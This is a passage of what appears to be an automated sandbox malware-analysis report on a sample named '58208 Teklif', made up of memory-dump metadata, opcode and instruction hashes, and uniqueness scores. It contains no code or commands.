                                                      • Opcode Fuzzy Hash: 19ba689f71bfcbc76da0df6dd20c5f43bfefe80d723f894478677d22b82455e6
                                                      • Instruction Fuzzy Hash: B1510278E01319DFDB15DFA5D9546AEBBB2FF88300F208529E805AB368DB356949CF40
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3766476904.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1410000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b8c60fc30f43f37b0c7d7bfeadb13e62b5784c6b416ab42178b956bb15d15cb6
                                                      • Instruction ID: 17a10350040ad5bba46e76842d2d9620877fb1dbb2f02ed98552f4c73a033ee6
                                                      • Opcode Fuzzy Hash: b8c60fc30f43f37b0c7d7bfeadb13e62b5784c6b416ab42178b956bb15d15cb6
                                                      • Instruction Fuzzy Hash: CF519374E012189FDB58DFAAD9949DDBBF2FF89300F209169E819AB364DB309901CF50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3790136651.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_6bd0000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0cb6659c6c4217f931a5c36bd00f1b902b7cdf51ffa53eddfeb795657664001f
                                                      • Instruction ID: 87bb482f737e83e26a8d3892487eb00a8cd7d519fefd00cafc00bdbbc5b84dc2
                                                      • Opcode Fuzzy Hash: 0cb6659c6c4217f931a5c36bd00f1b902b7cdf51ffa53eddfeb795657664001f
                                                      • Instruction Fuzzy Hash: 7941BF3190131ADFD704AF71E45D7EEBBB1EB4A306F005869E2026B2D4CB780A49CF90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3766476904.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1410000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 363df41ea917d36b032a5a3bdfc3b7027c1b2e8086e5e19844fa199401325ffb
                                                      • Instruction ID: 900e2db8501a69d7317e917cbbe7cd8e65a420f4a00fa5c4790bd2fb9bb26179
                                                      • Opcode Fuzzy Hash: 363df41ea917d36b032a5a3bdfc3b7027c1b2e8086e5e19844fa199401325ffb
                                                      • Instruction Fuzzy Hash: 16519674E01319DFCB48DFAAD49099DBBB6FF89310B208569E905AB364DB31AD42CF50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3766476904.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1410000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d6fda8ede2cd51e129c9f1e68b9086e3a79aef86ddbfbbe324a1d70adead097c
                                                      • Instruction ID: 47def19c53eff88d57b88c90d65d586f18009f9d5b5c84ed38d538976f883d76
                                                      • Opcode Fuzzy Hash: d6fda8ede2cd51e129c9f1e68b9086e3a79aef86ddbfbbe324a1d70adead097c
                                                      • Instruction Fuzzy Hash: 4E41D231A04249DFCF15CFA9C854A9EBFB2FF89318F048156E9519B369E330E950CB50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3790136651.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_6bd0000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 739712a071ec98f936ed76e009e39f24c79d0753cb2122485b1a3a6a3f62797c
                                                      • Instruction ID: 686661608cb27a48055d1f5450f9497c967a6b385ec7cdf632d92e9dcf164385
                                                      • Opcode Fuzzy Hash: 739712a071ec98f936ed76e009e39f24c79d0753cb2122485b1a3a6a3f62797c
                                                      • Instruction Fuzzy Hash: 86417071E0020A9BDB54DFA5C881ADEFBF5FF88700F248169E405BB240EB70A946CB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3766476904.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1410000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6103fa922862af8175e305775a57b8912c5b81b0db8d584d15d90cf84d85cf29
                                                      • Instruction ID: 2084fb570b50187781698975f569598fff7e5e973f4e0d3be6179ed636835fd4
                                                      • Opcode Fuzzy Hash: 6103fa922862af8175e305775a57b8912c5b81b0db8d584d15d90cf84d85cf29
                                                      • Instruction Fuzzy Hash: 9841C371A00208DFCB119F69C844BABBBF6FB44304F05846EE8559B365D7B4EC45CBA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3790136651.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_6bd0000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 970159b6d7349dc99c00ad4630092ed1b6f4789fab3aed0af9fb5d4ceb4f7388
                                                      • Instruction ID: 71e259a951906aaa401a5341aef3101fa18191f08bab45ab94e04998d56c5b5d
                                                      • Opcode Fuzzy Hash: 970159b6d7349dc99c00ad4630092ed1b6f4789fab3aed0af9fb5d4ceb4f7388
                                                      • Instruction Fuzzy Hash: 2441D0B8E01208DFDB44DFA9D5946EDBBF1BF48300F10952AE415AB298E7746946CF50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3790136651.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_6bd0000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4b759ff89eccc52860f5559076759e4961b29232a5f134c1620ffe24f0d17f44
                                                      • Instruction ID: d8ffc8b6393cc23ea12c1b13fa2bfab521e20c676de6e7ddfe4196443336dd8f
                                                      • Opcode Fuzzy Hash: 4b759ff89eccc52860f5559076759e4961b29232a5f134c1620ffe24f0d17f44
                                                      • Instruction Fuzzy Hash: 5A41EEB8E01208CFDB44DFA9D5946EDBBF1FB48300F10952AE415AB298E7346A46CF40
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3766476904.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1410000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 68a5ca2fba0be6a8e3f6631370a680f78fbed602a2789deef7bb0c96a297fc0b
                                                      • Instruction ID: 099fc79cdc95260ac796b275b6e674a362a6266822028055c492808742514f95
                                                      • Opcode Fuzzy Hash: 68a5ca2fba0be6a8e3f6631370a680f78fbed602a2789deef7bb0c96a297fc0b
                                                      • Instruction Fuzzy Hash: F331607174420AAFCB069F69D458AAF7FA6FB88310F048429F9058F355CB35ED61CBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3766476904.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1410000_58208 Teklif.jbxd
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3790136651.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_6bd0000_58208 Teklif.jbxd
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3766476904.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1410000_58208 Teklif.jbxd
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3766476904.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1410000_58208 Teklif.jbxd
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3766476904.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1410000_58208 Teklif.jbxd
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3765510797.00000000010ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 010ED000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10ed000_58208 Teklif.jbxd
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3766476904.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1410000_58208 Teklif.jbxd
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3765579480.00000000010FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010FD000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10fd000_58208 Teklif.jbxd
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3766476904.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1410000_58208 Teklif.jbxd
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3790136651.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_6bd0000_58208 Teklif.jbxd
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3766476904.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1410000_58208 Teklif.jbxd
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3790136651.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_6bd0000_58208 Teklif.jbxd
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3765510797.00000000010ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 010ED000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10ed000_58208 Teklif.jbxd
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3766476904.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1410000_58208 Teklif.jbxd
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3790136651.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_6bd0000_58208 Teklif.jbxd
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3766476904.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1410000_58208 Teklif.jbxd
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3790136651.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_6bd0000_58208 Teklif.jbxd
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3765579480.00000000010FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010FD000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10fd000_58208 Teklif.jbxd
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3766476904.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1410000_58208 Teklif.jbxd
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3790136651.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_6bd0000_58208 Teklif.jbxd
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3790136651.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_6bd0000_58208 Teklif.jbxd
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3790136651.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_6bd0000_58208 Teklif.jbxd
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3790136651.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_6bd0000_58208 Teklif.jbxd
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3790136651.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_6bd0000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6f07ac73e1c2c65091097f387f9bec3def10b2627d002a693c9d4d31d1587ba7
                                                      • Instruction ID: 19c3af3fac574859da29dddd4955e46270cdedf6d5be905f30ce0ccd4583ab2e
                                                      • Opcode Fuzzy Hash: 6f07ac73e1c2c65091097f387f9bec3def10b2627d002a693c9d4d31d1587ba7
                                                      • Instruction Fuzzy Hash: D9F089363001196F8F059E99AC549AF7FABEFC8260B004829FA05D7350DF31581197A5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3766476904.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1410000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9ab370aad0c29efbe3b4555971c12de8ca10abc9ee7f2954e65e753f2b6c502e
                                                      • Instruction ID: 9881684e2ac1c203c46f0e201e92faa7cd433983539ecb409d52f3263c0f21e1
                                                      • Opcode Fuzzy Hash: 9ab370aad0c29efbe3b4555971c12de8ca10abc9ee7f2954e65e753f2b6c502e
                                                      • Instruction Fuzzy Hash: 84D05B31D2022B57CB00E7A5DC044EFF738EED5265B908626D55437140FB702659C7E1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3766476904.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1410000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
                                                      • Instruction ID: ee005fc22bcbed56603096751db5c540d2c5c072dce6ee7c02f7f3c9949f4aa8
                                                      • Opcode Fuzzy Hash: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
                                                      • Instruction Fuzzy Hash: 9CC08C7320C52C2AA236508E7C40EE3BB8CC3C13B4B250237F91CE3352A8539C8101F8
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3766476904.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1410000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 27a7ee2d533ce0c7af1f4449bebfe1935ae1fc4f0452399e34a5b9d1b2808e4e
                                                      • Instruction ID: debc079fb50e727ea0adcff766d88b55a3e22fa13751a75d923520711be7458c
                                                      • Opcode Fuzzy Hash: 27a7ee2d533ce0c7af1f4449bebfe1935ae1fc4f0452399e34a5b9d1b2808e4e
                                                      • Instruction Fuzzy Hash: E7D0677BB410189FCB049F9DE880CDDB7B6FB9C221B448526E925A3261C631A961DB60
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3766476904.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1410000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ac98d6001b08c339bfefe3c45a96de53a4ed0db1f99f049a9e79a90f07eeb12b
                                                      • Instruction ID: 73f678e9f20341af483fa3f3ef5a53d5ac2816697a266b765d5e04e4b8cdf69b
                                                      • Opcode Fuzzy Hash: ac98d6001b08c339bfefe3c45a96de53a4ed0db1f99f049a9e79a90f07eeb12b
                                                      • Instruction Fuzzy Hash: 55C0127058430B4FC601F777FA4665A77AAB7C0300F404A74B1090E12DDF7468498691
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3790136651.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_6bd0000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: "$PH_q$PH_q$PH_q$PH_q$PH_q$PH_q$PH_q$PH_q
                                                      • API String ID: 0-1516622243
                                                      • Opcode ID: ef7bb97e16306b122e7d1ccfefff973312f48f749bd5d36ea7609241c5612290
                                                      • Instruction ID: ca63766dccc63e82f055ced269286fddf20f6455be443105bda9be58836b22fa
                                                      • Opcode Fuzzy Hash: ef7bb97e16306b122e7d1ccfefff973312f48f749bd5d36ea7609241c5612290
                                                      • Instruction Fuzzy Hash: F9329DB4E01218CFDB68DF69C994B9DBBF2BB89300F1084A9D409AB365DB715E85CF11
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3766476904.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1410000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: .5wq
                                                      • API String ID: 0-74813169
                                                      • Opcode ID: 713c55926f8d85a518f81905574caada626b69efd3e7bf737952a53547d066ec
                                                      • Instruction ID: 441d8fc45df940640b83fba61911dbd5b536fd43a82095adad68380b53dbd252
                                                      • Opcode Fuzzy Hash: 713c55926f8d85a518f81905574caada626b69efd3e7bf737952a53547d066ec
                                                      • Instruction Fuzzy Hash: 7E528F74E01229CFDB64DF69C994B9DBBB2BB89300F1085EAD409A7364DB319E85CF50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3789424768.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_5a90000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: fdf7dd8e0c70e61674ec487caf0fcf2ab76016534b5f074e4a75addc3cfad05c
                                                      • Instruction ID: 7d6594bec08e1da19a339bf31154ac326208b9a1986e8413a09bf255771f38ac
                                                      • Opcode Fuzzy Hash: fdf7dd8e0c70e61674ec487caf0fcf2ab76016534b5f074e4a75addc3cfad05c
                                                      • Instruction Fuzzy Hash: D772BD74E012298FDB68DF69C994BEDBBF2BB49300F1091E9D409A7255DB30AE81CF50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3789424768.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_5a90000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 56aac6d10afb0c6a67ba813d55b326d5a9edd34deef2a04bb8787e53f5abe483
                                                      • Instruction ID: 0f4c2b66988662c95cff3023a37b04f94975b24d41a9e3a2938b1f128af041f6
                                                      • Opcode Fuzzy Hash: 56aac6d10afb0c6a67ba813d55b326d5a9edd34deef2a04bb8787e53f5abe483
                                                      • Instruction Fuzzy Hash: B0C1A074E01228CFDB18DFA5D994B9DBBB2BF89300F1091A9D409AB368DB355E85CF50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3789424768.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_5a90000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 44ffce25f542de4723e2562b5a87941a269893ab7617cb004f20f83749a25484
                                                      • Instruction ID: d390d5fa49839fb86050565b0c98b11c495b3e7b8d170b8a8ed9ab158c91a27f
                                                      • Opcode Fuzzy Hash: 44ffce25f542de4723e2562b5a87941a269893ab7617cb004f20f83749a25484
                                                      • Instruction Fuzzy Hash: 2FC1A074E01228CFDB18DFA5D994B9DBBB2BF89300F1091A9D409AB368DB355E85CF50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3789424768.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_5a90000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 39b24e5434065a8421402ba2c57f825a0ae23e3f14a42c1b09be40ae558d1b98
                                                      • Instruction ID: a6d58e613c92a0f33699b92d82e9a11fc127422c2f829beefa3ffb07303f5141
                                                      • Opcode Fuzzy Hash: 39b24e5434065a8421402ba2c57f825a0ae23e3f14a42c1b09be40ae558d1b98
                                                      • Instruction Fuzzy Hash: 45C1B074E01219CFDB14DFA5D994B9DBBB2BF89300F1095A9D809AB358DB345A85CF10
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3789424768.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_5a90000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7422e2b92aff0f58a16edb79da5dea165bd9056cc26f6bc7c1e9b92c15d52c34
                                                      • Instruction ID: 2a47525da5f10fa4f951f63301c39e873dc9ba607406bf98f761e982a71a3917
                                                      • Opcode Fuzzy Hash: 7422e2b92aff0f58a16edb79da5dea165bd9056cc26f6bc7c1e9b92c15d52c34
                                                      • Instruction Fuzzy Hash: 20C1B078E01218DFDB14DFA5D994B9DBBB2BF89300F2091A9D809AB364DB345E85CF50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3789424768.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_5a90000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 00c31e4d27d6cafd0bfa957273fae02499a72007fa3f38432de11bf87a31ca40
                                                      • Instruction ID: 4d6345716179e471a6dff857eb5013366f64011822bfeb97e7016e8f8e7ed51b
                                                      • Opcode Fuzzy Hash: 00c31e4d27d6cafd0bfa957273fae02499a72007fa3f38432de11bf87a31ca40
                                                      • Instruction Fuzzy Hash: 88C1B174E01228CFDB18DFA5D994B9DBBB2BF89300F1091A9D409AB368DB355E85CF50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3789424768.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_5a90000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 897da2000a774fc3fcb4f9aea054fe82ed57cb9f5dd67c7a6a2972cda10413ff
                                                      • Instruction ID: 88eae0ac497b9cd6381d0c6fe3b129ad8f144ca6b5161cadfc1be449b430dac6
                                                      • Opcode Fuzzy Hash: 897da2000a774fc3fcb4f9aea054fe82ed57cb9f5dd67c7a6a2972cda10413ff
                                                      • Instruction Fuzzy Hash: 74C1B078E01219CFDB14DFA5D994B9DBBF2BF89300F1095A9D809AB368DB345A85CF10
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3789424768.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_5a90000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a00ecf8ed3d325ca58d7569f081ca04e5b5b1eb825ddfb3441219d2f3c533506
                                                      • Instruction ID: 01db9a0f1e595905371b722e2962fb0d5351f67b5f4d7eb17e7de2b26e7a271c
                                                      • Opcode Fuzzy Hash: a00ecf8ed3d325ca58d7569f081ca04e5b5b1eb825ddfb3441219d2f3c533506
